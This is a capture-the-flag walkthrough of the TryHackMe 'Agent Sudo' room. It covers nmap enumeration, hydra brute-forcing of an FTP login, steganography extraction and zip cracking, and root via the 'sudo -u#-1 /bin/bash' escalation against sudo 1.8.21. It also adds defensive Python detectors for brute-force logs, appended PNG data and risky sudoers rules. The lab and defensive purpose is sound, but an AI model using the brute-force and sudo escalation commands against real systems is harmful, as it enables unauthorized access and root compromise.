In this walkthrough, we will be going through the Agent Sudo room from TryHackMe. The room covers basic enumeration, getting initial access with some brute-forcing, and then elevating privileges by abusing the sudo binary. Overall, it is a fun beginner-level room that covers various basic topics and will test your methodology. So, without any delay, let’s get started.
Objective: You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.
Task 1 – Author note
Task 2 – Enumerate
Enumerate the machine and get all the important information.
- Checking whether the machine is live.
Question 1 – How many open ports?
- Scanning the machine using nmap.
sudo nmap -sS -sV 10.10.203.67
Question 2 – How you redirect yourself to a secret page?
- Accessing the website on port 80.
Question 3 – What is the agent name?
- Use the User-Agent Switcher extension, set the user agent value to “C”, then refresh the page.
Task 3 – Hash cracking and brute-force
Done enumerate the machine? Time to brute your way out.
Question 1 – FTP password
- Brute-forcing the FTP password of user chris with hydra.
hydra -l chris -P ~/Desktop/Wordlist/rockyou.txt ftp://10.10.203.67
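The hydra run above is exactly the pattern a defender wants to catch in the FTP server's own log: a burst of FAIL LOGIN lines for one user from one client, followed by an OK LOGIN. The following Python script is an added example, not part of the original post or of the room; it parses a handful of constructed vsftpd-format log lines (the IPs, user names and timestamps are made up) and flags any (client, user) pair that exceeds a failure threshold inside a sliding time window, noting whether a successful login followed the last failure.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in vsftpd's default log format; the IPs, users and
# times are made up for this example and are not from the room.
SAMPLE_LOG = """\
Sun Oct  4 10:00:01 2020 [pid 2311] CONNECT: Client "10.10.14.5"
Sun Oct  4 10:00:02 2020 [pid 2311] [chris] FAIL LOGIN: Client "10.10.14.5"
Sun Oct  4 10:00:02 2020 [pid 2313] [chris] FAIL LOGIN: Client "10.10.14.5"
Sun Oct  4 10:00:03 2020 [pid 2315] [chris] FAIL LOGIN: Client "10.10.14.5"
Sun Oct  4 10:00:03 2020 [pid 2317] [chris] FAIL LOGIN: Client "10.10.14.5"
Sun Oct  4 10:00:04 2020 [pid 2319] [chris] FAIL LOGIN: Client "10.10.14.5"
Sun Oct  4 10:00:05 2020 [pid 2321] [chris] OK LOGIN: Client "10.10.14.5"
Sun Oct  4 10:05:00 2020 [pid 2400] [james] FAIL LOGIN: Client "192.168.1.20"
Sun Oct  4 10:30:00 2020 [pid 2450] [james] OK LOGIN: Client "192.168.1.20"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'(?:\[(?P<user>[^\]]+)\] )?'
    r'(?P<event>CONNECT|FAIL LOGIN|OK LOGIN): Client "(?P<ip>[^"]+)"$'
)


def parse_vsftpd(text):
    """Turn vsftpd log lines into (timestamp, client_ip, user, event) tuples.
    Lines that do not match the three known events are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
        events.append((ts, m.group("ip"), m.group("user"), m.group("event")))
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Flag (client_ip, user) pairs with at least `threshold` failed logins
    inside any `window_seconds` window. The value is (peak failures in one
    window, whether a successful login for the same pair followed the last
    failure); the second flag is the sign that a guess eventually worked."""
    fails = defaultdict(list)
    last_success = {}
    for ts, ip, user, event in events:
        if event == "FAIL LOGIN":
            fails[(ip, user)].append(ts)
        elif event == "OK LOGIN":
            last_success[(ip, user)] = max(ts, last_success.get((ip, user), ts))

    alerts = {}
    for key, times in fails.items():
        times.sort()
        peak, start = 0, 0
        for end in range(len(times)):  # sliding window over sorted failure times
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            success_after = key in last_success and last_success[key] > times[-1]
            alerts[key] = (peak, success_after)
    return alerts


if __name__ == "__main__":
    for (ip, user), (count, cracked) in detect_bruteforce(parse_vsftpd(SAMPLE_LOG)).items():
        print(f"{ip} -> {user}: {count} failures in window, success afterwards: {cracked}")
```

On the sample input only the chris/10.10.14.5 pair trips the default threshold, and it is marked as followed by a success, which is the case an analyst should look at first; james's single failure half an hour before a normal login is left alone.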
Question 2 – Zip file password
- Logging into the FTP server with the credentials we got earlier and downloading the files.
- Reading contents of To_agentJ.txt
- Tried exiftool and steghide on both of the images. Got nothing useful.
- Using binwalk to reveal hidden files. Binwalk is a fast and easy-to-use tool for analyzing, reverse engineering, and extracting firmware images.
binwalk cutie.png
binwalk -e cutie.png
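What binwalk reports here is data sitting after the PNG's IEND chunk, which image viewers ignore but which is a classic place to hide a second file. The following Python script is an added example, not code from the post or from binwalk: it walks the PNG chunk list (verifying each CRC), finds where the image legitimately ends, and reports whatever trails it, labelling the tail by its magic bytes. The sample inputs are constructed in the script itself, a minimal 1x1 PNG and the same PNG with a real ZIP archive appended, so nothing from the room is needed to run it.

```python
import io
import struct
import zipfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# Magic numbers used to label whatever follows IEND; extend as needed.
KNOWN_MAGIC = {
    b"PK\x03\x04": "ZIP local file header",
    b"\x1f\x8b": "gzip",
    b"\xff\xd8\xff": "JPEG",
    PNG_SIG: "PNG",
}


def _chunk(ctype, data=b""):
    """Encode one PNG chunk: big-endian length, 4-byte type, data, CRC32(type+data)."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_minimal_png():
    """A constructed 1x1 greyscale PNG used as sample input (not the room's cutie.png)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit, colour type 0
    idat = zlib.compress(b"\x00\x00")  # filter byte 0 + one grey pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND")


def build_png_with_appended_zip():
    """Constructed polyglot: a valid PNG with a real ZIP archive glued after IEND."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("note.txt", "constructed sample payload")
    return build_minimal_png() + buf.getvalue()


def png_end_offset(data):
    """Walk the chunk list, verifying each CRC, and return the offset just past IEND.
    Raises ValueError for anything that is not a well-formed PNG up to that point."""
    if not data.startswith(PNG_SIG):
        raise ValueError("missing PNG signature")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunk_end = pos + 8 + length + 4
        if chunk_end > len(data):
            raise ValueError("truncated chunk %r" % ctype)
        stored_crc = struct.unpack(">I", data[chunk_end - 4:chunk_end])[0]
        if zlib.crc32(data[pos + 4:chunk_end - 4]) & 0xFFFFFFFF != stored_crc:
            raise ValueError("bad CRC in chunk %r" % ctype)
        pos = chunk_end
        if ctype == b"IEND":
            return pos
    raise ValueError("no IEND chunk found")


def trailing_data(data):
    """Return (iend_offset, appended_bytes, guessed_type). A clean image yields
    b"" and None; anything else is data the PNG decoder silently ignores."""
    end = png_end_offset(data)
    tail = data[end:]
    guess = next((name for magic, name in KNOWN_MAGIC.items() if tail.startswith(magic)), None)
    return end, tail, guess


if __name__ == "__main__":
    for label, img in (("clean", build_minimal_png()), ("polyglot", build_png_with_appended_zip())):
        off, tail, guess = trailing_data(img)
        print(f"{label}: IEND ends at byte {off}, {len(tail)} trailing bytes, looks like {guess}")
```

Checking the CRC of every chunk on the way to IEND matters: a file that is not a valid PNG up to that point is reported as malformed rather than silently scanned, which is the distinction an incident responder wants between "corrupt image" and "image carrying an appended archive".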
- Converting the zip file into a John-compatible hash with zip2john and cracking it.
zip2john 8702.zip > hash.txt
Question 3 – steg password
- Extracting the zip file with the password cracked above.
- Decoded the base64 string in CyberChef. We got the password.
Question 4 – Who is the other agent (in full name)?
- Extracting the content hidden in the image with steghide, using the decoded password.
steghide extract -sf cute-alien.jpg
Question 5 – SSH password
Task 4 – Capture the user flag
You know the drill.
Question 1 – What is the user flag?
- Logging in over SSH and reading the user flag.
Question 2 – What is the incident of the photo called?
- Search on Google – alien autopsy incident foxnews
Roswell alien autopsy
Task 5 – Privilege escalation
Enough with the extraordinary stuff? Time to get real.
- Transferring the linpeas script from our local machine to the target and running it there.
Question 1 – CVE number for the escalation
- Searching for the sudo version reported by linpeas (1.8.21), I found the vulnerability.
Question 2 – What is the root flag?
sudo -u#-1 /bin/bash
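The invocation above only pays off when sudoers grants a user every target except root, written as a Runas list of ALL with a "!root" exclusion; on a sudo build with the bug, the bogus user id slips past that exclusion and the command runs as root. The following Python script is an added example, not from the post, linpeas or sudo: it audits a constructed sudoers excerpt for exactly that rule shape and parses the version line of `sudo -V` so it can be compared against whatever fixed version the advisory for the CVE in Question 1 gives (the fixed version is deliberately a parameter here, not hard-coded). The rule for chris and the `sudo -V` text are made up for the example, the version number matching the one the page reports.

```python
import re

# Constructed sudoers excerpt for this example (not the room's file). The rule
# for chris grants every target user except root, which is the shape of rule
# that the "-u#-1" invocation above gets past on a vulnerable sudo build.
SAMPLE_SUDOERS = """\
Defaults        env_reset
# User privilege specification
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
chris   ALL=(ALL, !root) NOPASSWD: /bin/bash
james   ALL=(www-data) /usr/bin/less
"""

# Constructed first lines of `sudo -V`, using the version the page reports.
SAMPLE_SUDO_V = "Sudo version 1.8.21\nSudoers policy plugin version 1.8.21\n"

RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.*)$'
)


def negated_runas_rules(sudoers_text):
    """Return (user_or_group, excluded_targets, command_spec) for every rule
    whose Runas list is ALL minus explicit exclusions. Comment and Defaults
    lines are skipped; #include directives are not followed."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = RULE_RE.match(line)
        if not m or line.startswith("Defaults"):
            continue
        runas_users = m.group("runas").split(":", 1)[0]  # drop the optional :group part
        items = [x.strip() for x in runas_users.split(",") if x.strip()]
        excluded = [x[1:] for x in items if x.startswith("!")]
        if "ALL" in items and excluded:
            findings.append((m.group("who"), excluded, m.group("cmds").strip()))
    return findings


def parse_sudo_version(sudo_v_output):
    """Extract (major, minor, patch) from the 'Sudo version x.y.z' line of `sudo -V`."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", sudo_v_output)
    if not m:
        raise ValueError("no sudo version line found")
    return tuple(int(x) for x in m.groups())


def is_older_than(version, fixed_version):
    """True when `version` predates `fixed_version`; take the fixed version from
    the vendor advisory for the CVE the room asks about."""
    return tuple(version) < tuple(fixed_version)


if __name__ == "__main__":
    print("sudo", ".".join(map(str, parse_sudo_version(SAMPLE_SUDO_V))))
    for who, excluded, cmds in negated_runas_rules(SAMPLE_SUDOERS):
        print(f"{who}: may run {cmds!r} as any user except {excluded}; "
              "replace with an explicit allow-list of target users")
```

The remediation the audit points at is independent of the sudo upgrade: a Runas list that enumerates the intended target users cannot be turned into root by any trick with user ids, whereas "ALL except root" relies on sudo resolving the exclusion correctly.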
Question 3 – (Bonus) Who is Agent R?
So that was it. We started the room with basic enumeration using nmap. Next, we used the User-Agent Switcher to get a potential username to proceed further. Moving on, we brute-forced the FTP password of user “chris” and downloaded the three files: two pictures and one text file. On the downloaded files, we used binwalk to extract the hidden zip file, then converted the zip into a hash and cracked its password with John. The zip file gave us a base64 string; decoding it yielded the steg password of the challenge. Using that password, we decoded the message hidden in the picture, and the output file gave us the other user’s name and SSH password. For initial access, we logged in over SSH with those credentials and got the first flag. For privilege escalation, we ran linpeas to find a potential escalation vector and found a vulnerable sudo version. Leveraging that, we got root.